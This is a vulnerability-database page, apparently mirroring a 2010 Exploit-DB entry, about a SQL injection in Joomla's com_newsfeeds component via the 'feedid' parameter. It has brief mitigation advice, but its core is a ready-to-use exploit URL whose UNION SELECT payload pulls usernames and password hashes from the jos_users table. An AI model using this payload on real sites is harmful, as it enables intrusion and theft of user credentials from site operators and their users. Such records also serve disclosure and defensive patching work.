header-logo
Suggest Exploit
vendor:
N/A
by:
Archimonde
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_newsfeeds SQL injection vulnerability

The vulnerability exists in the Joomla component com_newsfeeds, which allows an attacker to inject arbitrary SQL commands. By manipulating the 'feedid' parameter in the 'index.php' file, an attacker can inject malicious SQL commands. An example of this is shown in the exploit code, where the attacker can inject a 'UNION SELECT' statement to retrieve the username and password of the Joomla users.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries. Additionally, it is recommended to use parameterized queries instead of dynamic SQL queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :

Email : archimondera@gmail.com
Website : xgroupvn.org - programmer.vn

index.php?option=com_newsfeeds&view=categories&feedid=[sqli]

Example:

http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

Navigation

Suggest Exploit

Services By CQR